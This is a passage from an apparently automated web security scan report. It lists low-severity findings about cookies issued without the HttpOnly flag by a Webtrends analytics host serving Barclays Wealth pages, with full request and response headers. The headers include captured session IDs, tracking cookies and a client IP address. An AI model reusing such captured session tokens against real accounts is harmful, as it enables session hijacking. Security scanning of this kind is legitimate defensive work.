3f89cee5920595b5c06102533ba2e325817ebf4032d6106530f3b97c92b4f6e3e4359612ac322af65b42af52007fe3a2ae2e1a65aa10c520449f40a0b27eb0418a84600ec28c7be9662afd0584e35d9373f46daf655c8f115cc82f8c09cd39719abb36dc59c00fc279633b734891ffc4ebc13d6bc2e2bb92db9dfed8a8ae163e4de1dbd7d1cb554051a04b2a47dd17d2484164308345d55bcfc7d88a31c02b0444b93c621d2543fc71496b653ffda87966973320483e11103901c3881bce99a6b422be5f73883eb43913437e61e4ecb5341e5a1517ef7dd8ebcbf314c51f4187cd197aba019e1c1da665f9d80ed3a322e1dce4690e4f3de97bfca95d662b6a4e8fd4344f5c8879c9e4ef2b9efce3b901c370fc01046a077adfc21053525c5abafb4e000898f7cc495851aca6fb5aec12f60e4c8397fbdbba3b422e12b54a9834487952ac58c03bd8dbb5e2577005b409d849a2a4b3acce676f013e5df2cf539b1f07f6aed85dbcc4ad228f8cf28a7f440da651282427493b5837e322f47dbd598911423263c926c92318c00815dd25724b35ef037392091c5d88da9a57a412d1f74da3b580f6fd7c5dab2ca7dafb2d87223056daf90f1992685708e716157b88f514acfcecaf49c4003d0b82115796769084acc7abc6276fbee3484b9cc674d5ab4cc623f08a5d68392f40be29c2faa7d320b0793862444364c04b1e1312d4ccc7b16a627285c944098f6b1be3d9837734338673704af4ff8695b70964afc463dd8f8f233c34518bba5dea59d369c5aa49f5a5189040aafb91a68054aa3ea49691de9f56bab651b864e900cbcc726cbb15e1880bdb54fe6fa6be44e5e4641388b87511e0744b99ff812fa7508002ec727d6cbae0588d2c1612f43a951de3e58281c5fb5e91074126ea6a75a16cc8e24807672a29d5193bc8a8f44433f6119ecab6d81398371ef5a3d79cdf21fad6702b3a498e813965d00ef3625272753729385f0c0f18246e30049e1af2a880017759733244a9107a360a6997f7072a5ecda6ef00d791239f854af9aabf004cd52a781af35d7757a05b0f92dbe77930c396a7eaa1dfb343f32e44d6a16584af5b2a51a6bd17a9bafe871c6136a7f3cd5f9f5613fc69da81484206e5b368845d9caf38b88884a5df0a10b193cc028f0591  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b34e13fc5045e2d98a069be11f8167050f8807b19d0c3f89cee5920595b5c06102533ba2e325817ebf4032d6106530f3b97c92b4f6e3e4359612ac322af65b42af52007fe3a2ae2e1a65aa10c520449f40a0b27eb0418a84600ec28c7be9662afd0584e35d9373f46daf655c8f115cc82f8c09cd39719abb36dc59c00fc279633b734891ffc4ebc13d6bc2e2bb92db9dfed8a8ae163e4de1dbd7d1cb554051a04b2a47dd17d2484164308345d55bcfc7d88a31c02b0444b93c621d2543fc71496b653ffda87966973320483e11103901c3881bce99a6b422be5f73883eb43913437e61e4ecb5341e5a1517ef7dd8ebcbf314c51f4187cd197aba019e1c1da665f9d80ed3a322e1dce4690e4f3de97bfca95d662b6a4e8fd4344f5c8879c9e4ef2b9efce3b901c370fc01046a077adfc21053525c5abafb4e000898f7cc495851aca6fb5aec12f60e4c8397fbdbba3b422e12b54a9834487952ac58c03bd8dbb5e2577005b409d849a2a4b3acce676f013e5df2cf539b1f07f6aed85dbcc4ad228f8cf28a7f440da651282427493b5837e322f47dbd598911423263c926c92318c00815dd25724b35ef037392091c5d88da9a57a412d1f74da3b580f6fd7c5dab2ca7dafb2d87223056daf90f1992685708e716157b88f514acfcecaf49c4003d0b82115796769084acc7abc6276fbee3484b9cc674d5ab4cc623f08a5d68392f40be29c2faa7d320b0793862444364c04b1e1312d4ccc7b16a627285c944098f6b1be3d9837734338673704af4ff8695b70964afc463dd8f8f233c34518bba5dea59d369c5aa49f5a5189040aafb91a68054aa3ea49691de9f56bab651b864e900cbcc726cbb15e1880bdb54fe6fa6be44e5e4641388b87511e0744b99ff812fa7508002ec727d6cbae0588d2c1612f43a951de3e58281c5fb5e91074126ea6a75a16cc8e24807672a29d5193bc8a8f44433f6119ecab6d81398371ef5a3d79cdf21fad6702b3a498e813965d00ef3625272753729385f0c0f18246e30049e1af2a880017759733244a9107a360a6997f7072a5ecda6ef00d791239f854af9aabf004cd52a781af35d7757a05b0f92dbe77930c396a7eaa1dfb343f32e44d6a16584af5b2a51a6bd17a9bafe871c6136a7f3cd5f9f5613fc69da81484206e5b368845d9caf38b88884a5df0a10b193cc028f0591

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b34e13fc5045e2d98a069be11f8167050f8807b19d0c3f89cee5920595b5c06102533ba2e325817ebf4032d6106530f3b97c92b4f6e3e4359612ac322af65b42af52007fe3a2ae2e1a65aa10c520449f40a0b27eb0418a84600ec28c7be9662afd0584e35d9373f46daf655c8f115cc82f8c09cd39719abb36dc59c00fc279633b734891ffc4ebc13d6bc2e2bb92db9dfed8a8ae163e4de1dbd7d1cb554051a04b2a47dd17d2484164308345d55bcfc7d88a31c02b0444b93c621d2543fc71496b653ffda87966973320483e11103901c3881bce99a6b422be5f73883eb43913437e61e4ecb5341e5a1517ef7dd8ebcbf314c51f4187cd197aba019e1c1da665f9d80ed3a322e1dce4690e4f3de97bfca95d662b6a4e8fd4344f5c8879c9e4ef2b9efce3b901c370fc01046a077adfc21053525c5abafb4e000898f7cc495851aca6fb5aec12f60e4c8397fbdbba3b422e12b54a9834487952ac58c03bd8dbb5e2577005b409d849a2a4b3acce676f013e5df2cf539b1f07f6aed85dbcc4ad228f8cf28a7f440da651282427493b5837e322f47dbd598911423263c926c92318c00815dd25724b35ef037392091c5d88da9a57a412d1f74da3b580f6fd7c5dab2ca7dafb2d87223056daf90f1992685708e716157b88f514acfcecaf49c4003d0b82115796769084acc7abc6276fbee3484b9cc674d5ab4cc623f08a5d68392f40be29c2faa7d320b0793862444364c04b1e1312d4ccc7b16a627285c944098f6b1be3d9837734338673704af4ff8695b70964afc463dd8f8f233c34518bba5dea59d369c5aa49f5a5189040aafb91a68054aa3ea49691de9f56bab651b864e900cbcc726cbb15e1880bdb54fe6fa6be44e5e4641388b87511e0744b99ff812fa7508002ec727d6cbae0588d2c1612f43a951de3e58281c5fb5e91074126ea6a75a16cc8e24807672a29d5193bc8a8f44433f6119ecab6d81398371ef5a3d79cdf21fad6702b3a498e813965d00ef3625272753729385f0c0f18246e30049e1af2a880017759733244a9107a360a6997f7072a5ecda6ef00d791239f854af9aabf004cd52a781af35d7757a05b0f92dbe77930c396a7eaa1dfb343f32e44d6a16584af5b2a51a6bd17a9bafe871c6136a7f3cd5f9f5613fc69da81484206e5b368845d9caf38b88884a5df0a10b193cc028f0591 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/debit-cards.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A3D550880A45CA7718800D08622321F7; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=f4be6fb10e561e19b362e17be8e54985a21e7d8c08da7565c9f725264895b2de21195dd232f468eb32a502163635a3366bc906e51ea492f77d4072456b73d3258873d1d51fd5a6e43f8c56ecc851bb0bfa65887ddf50cc1df578ccf8210063e053; _wt.mode-79569=e1f36dbd085f0088adcd; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200988e87

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:16 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=1836E1C2F530E7BCED230AB0A2091BE5; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d04610a68; Expires=Sun, 01-Jan-2012 00:02:17 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=045f6179; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93202c8abcc; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.26. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b54a03f64809f8cbd50b86a91e9b6353178946a097073d9486f5d14d8ab9f851302212cf9503a8449876319d516c73b3d90ae0d29bc0835de176840861ac5d45a71d007dfff6a1784b71ad1997714bc707b1b015a25d99a71f7dc9c51eb42268ba4dd1b6038a168a01b2785eb5353cf22e8e0dcb2762a98c05fa67c02be8455b2a1619d4a784ba94573781a0ffe39ac6a487bfba043f44e5c1cdc68c0b1017c81f6a118600c65a052675c44bdb0af1f5f58a04f76a5644ea7a3443727981281f51504281da0b6a9c20781d240801556985d2479c8aaba32aa9567a8f21bd3f11477c6bf3e5be33075e1f1fe070d7fcc2f813dc1b5a92d77e13e144c04f08a97ef1ce0ecbbc23edc1f507660f70bd21e6a55d7b270421d49169024f816acff3fa30f99ba0ef409b0d99564129556bd4d7144847463dd3a00b434394b89a151513edb5e04d8a5cba1819c2c8a198fb221b7448f30e83351e477ae947e224c6c3bec3542a61f9599e42ce92bcd1c57448452c54bde75edd7c16a6e8db79cf93ed2b9bdbae8279455dac5178762d13390d33e176f278bc038f4c166a35cf74c92614960917de7470493bb30e23955f1c57dad89603f343d1a247fdb281f7aa2c57ac2ea2d2fe2d80723e068ca15a1a91665359e814127b8ef712faf1ecf81cc4046d5cd6420397269483ac95a9c6736fbeb91e4ac1c575d6fc1d9425f0845b6a6e2c1ee92bc5a6f6807bbd716b34464234964f121c49d59fc0ee6b6323d7cb155ade6441b08ad77c623a8571704da4add295f01023c88074c2d385753d295284be5bb24dd1698cb970b1e7529f4bfea689f78951a43fe7c8d0dcde1efb8a11fe78f94a9d8c6f69bb43ef801fd554b4799bac07a8f0224798a1731ab37247daf39678f650d751ed722a6ee8e50d8d2c1617f73ac14fbeb384dc9eac0494071276be6f76a73bcab34e5b607b71d51c36c6ada24063f4119bcde4dc409e651fa7aedd9cd727fa83717f3b4bdd813f63800cae67522a21332e685c0d021e703c60009f1ea2f38701205a706043fb1171645a6892f952255b9aaeb802d49e23c98718a9f4bb071a8c2a2719f2027557a2015890d9e1293ac1c7a4befcddbe46f3294982f03782fe5a2f56a3e849aabaf98a483e64ada7cf059c0a45f26cd58714160ee0e33cdb0a9dfc39b88285f4df0d0bfb8ad3f03e84eddc81edc15a237f08348b0aab3202610250980c  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b54a03f64809f8cbd50b86a91e9b6353178946a097073d9486f5d14d8ab9f851302212cf9503a8449876319d516c73b3d90ae0d29bc0835de176840861ac5d45a71d007dfff6a1784b71ad1997714bc707b1b015a25d99a71f7dc9c51eb42268ba4dd1b6038a168a01b2785eb5353cf22e8e0dcb2762a98c05fa67c02be8455b2a1619d4a784ba94573781a0ffe39ac6a487bfba043f44e5c1cdc68c0b1017c81f6a118600c65a052675c44bdb0af1f5f58a04f76a5644ea7a3443727981281f51504281da0b6a9c20781d240801556985d2479c8aaba32aa9567a8f21bd3f11477c6bf3e5be33075e1f1fe070d7fcc2f813dc1b5a92d77e13e144c04f08a97ef1ce0ecbbc23edc1f507660f70bd21e6a55d7b270421d49169024f816acff3fa30f99ba0ef409b0d99564129556bd4d7144847463dd3a00b434394b89a151513edb5e04d8a5cba1819c2c8a198fb221b7448f30e83351e477ae947e224c6c3bec3542a61f9599e42ce92bcd1c57448452c54bde75edd7c16a6e8db79cf93ed2b9bdbae8279455dac5178762d13390d33e176f278bc038f4c166a35cf74c92614960917de7470493bb30e23955f1c57dad89603f343d1a247fdb281f7aa2c57ac2ea2d2fe2d80723e068ca15a1a91665359e814127b8ef712faf1ecf81cc4046d5cd6420397269483ac95a9c6736fbeb91e4ac1c575d6fc1d9425f0845b6a6e2c1ee92bc5a6f6807bbd716b34464234964f121c49d59fc0ee6b6323d7cb155ade6441b08ad77c623a8571704da4add295f01023c88074c2d385753d295284be5bb24dd1698cb970b1e7529f4bfea689f78951a43fe7c8d0dcde1efb8a11fe78f94a9d8c6f69bb43ef801fd554b4799bac07a8f0224798a1731ab37247daf39678f650d751ed722a6ee8e50d8d2c1617f73ac14fbeb384dc9eac0494071276be6f76a73bcab34e5b607b71d51c36c6ada24063f4119bcde4dc409e651fa7aedd9cd727fa83717f3b4bdd813f63800cae67522a21332e685c0d021e703c60009f1ea2f38701205a706043fb1171645a6892f952255b9aaeb802d49e23c98718a9f4bb071a8c2a2719f2027557a2015890d9e1293ac1c7a4befcddbe46f3294982f03782fe5a2f56a3e849aabaf98a483e64ada7cf059c0a45f26cd58714160ee0e33cdb0a9dfc39b88285f4df0d0bfb8ad3f03e84eddc81edc15a237f08348b0aab3202610250980c

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b54a03f64809f8cbd50b86a91e9b6353178946a097073d9486f5d14d8ab9f851302212cf9503a8449876319d516c73b3d90ae0d29bc0835de176840861ac5d45a71d007dfff6a1784b71ad1997714bc707b1b015a25d99a71f7dc9c51eb42268ba4dd1b6038a168a01b2785eb5353cf22e8e0dcb2762a98c05fa67c02be8455b2a1619d4a784ba94573781a0ffe39ac6a487bfba043f44e5c1cdc68c0b1017c81f6a118600c65a052675c44bdb0af1f5f58a04f76a5644ea7a3443727981281f51504281da0b6a9c20781d240801556985d2479c8aaba32aa9567a8f21bd3f11477c6bf3e5be33075e1f1fe070d7fcc2f813dc1b5a92d77e13e144c04f08a97ef1ce0ecbbc23edc1f507660f70bd21e6a55d7b270421d49169024f816acff3fa30f99ba0ef409b0d99564129556bd4d7144847463dd3a00b434394b89a151513edb5e04d8a5cba1819c2c8a198fb221b7448f30e83351e477ae947e224c6c3bec3542a61f9599e42ce92bcd1c57448452c54bde75edd7c16a6e8db79cf93ed2b9bdbae8279455dac5178762d13390d33e176f278bc038f4c166a35cf74c92614960917de7470493bb30e23955f1c57dad89603f343d1a247fdb281f7aa2c57ac2ea2d2fe2d80723e068ca15a1a91665359e814127b8ef712faf1ecf81cc4046d5cd6420397269483ac95a9c6736fbeb91e4ac1c575d6fc1d9425f0845b6a6e2c1ee92bc5a6f6807bbd716b34464234964f121c49d59fc0ee6b6323d7cb155ade6441b08ad77c623a8571704da4add295f01023c88074c2d385753d295284be5bb24dd1698cb970b1e7529f4bfea689f78951a43fe7c8d0dcde1efb8a11fe78f94a9d8c6f69bb43ef801fd554b4799bac07a8f0224798a1731ab37247daf39678f650d751ed722a6ee8e50d8d2c1617f73ac14fbeb384dc9eac0494071276be6f76a73bcab34e5b607b71d51c36c6ada24063f4119bcde4dc409e651fa7aedd9cd727fa83717f3b4bdd813f63800cae67522a21332e685c0d021e703c60009f1ea2f38701205a706043fb1171645a6892f952255b9aaeb802d49e23c98718a9f4bb071a8c2a2719f2027557a2015890d9e1293ac1c7a4befcddbe46f3294982f03782fe5a2f56a3e849aabaf98a483e64ada7cf059c0a45f26cd58714160ee0e33cdb0a9dfc39b88285f4df0d0bfb8ad3f03e84eddc81edc15a237f08348b0aab3202610250980c HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/barclays-infinite-credit-card.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4274AF1E58216E26E0C3901397ECB67E; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d04610a68; _wt.mode-79569=fcdcc722e932029c8164; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2008dfa14

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:18 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=436AD3879C2C3E6CD9AACE2057A0AD3B; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d042f457f; Expires=Sun, 01-Jan-2012 00:02:19 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=01ca2f20; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93202d188d0; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.27. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f75d5010d692ad89ce20478fdda038aa0753f64b07ead19d11caf50cd75a632df77193a62612b5e7c9d6078da4a8476d3242d68e02f406c22e308b5e346da5b9638fb1fee0e12cc51afe6f31a01c4cbd5a0209f0efba58311bf558a07114d307f7f748fe32ef946716ffb97bd82703eb0392e758af6bce57844146ac2a00fb7ec24a886926fde5779c1ea94b83273b2c7a5f8ef6c0e3c72a73d7a7e6da98efae9ffee804345fa58b8e969a10047c915a7047da5b9c185a7a68d15ecc4fa1bef3ad3eb2387f16a034397f686bf0705876365c85e46a7284672840374716385395c0199f9fa5b728b6562a8729b36f124d2a6bb9e1eb37005d1610bb7cd7e496f310de1c06938c7510ae46c64c59a47ffbc10fcfa02bfa8ee7600e4b35b37ba7fc462c3900299c926f1e4fd768cba5f430f8c6a5fa5f8d31a2475371537b8bc2440c580257b4b71e1c0084e78e420c14ede5ef1b8501e7461bdbc8b69be53457201ab44ec22f0b2a34aa0ab77ccb8ef89d0a3665f559cc4381d6edbcc72131066e0ef09c53cb1c07f6fdd10beeccfe748bdaa7892a170cac0d7c323253596d5a9417803bbf18d04d047f76a34f89344cc71d1dca266a4e3ce70729955e4a588ac59251f141d6fd46fdb980e0a92d5fae78abd3f124873f3756deaf09139d660d5df01701329f9b2eb8bcb8ff0dc9156811860854926d97d5aac3facc2c62beed5d54daa84f95ee47c134ab9e097e266b27826980f2be9222a77974314710359444121312d58692f96e7c649295431cc87e0fa2e5923b286fd9272354a6f68690ac077cd2d574978183706b2b038bbc59e348da2a95fd19a2b150d07bedb78ab5c301e02bf2cbc78c8458a2cb43f573ad17988d3e3de312b4851cd610a86ffdba4ae5e76741d2ba2612b17449cbfb8327f7038007ed762e6eece45f89781111f33f9718bae687dcc8fa5796061423bf6a72a03f98b11405647a2a8e1e38c4afa54737ae44c999b6db129c631bfff68fc88e77af85217d3e1cdb826a30d15ffd6c542526342e3d010a004d236435539b15f6a98957250c716744a5117a33096396fc052a5ac8aabd02879d7cccd54daba1b9034dd07c281ba45a7350a00c0c9dd7e7293294c4f8e6a1ddbf4ba12a4587a660d0ff012505a3e84aa6e6f9854f6c63f7f2c5079d5a11f168d38715024afeab05e43102  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
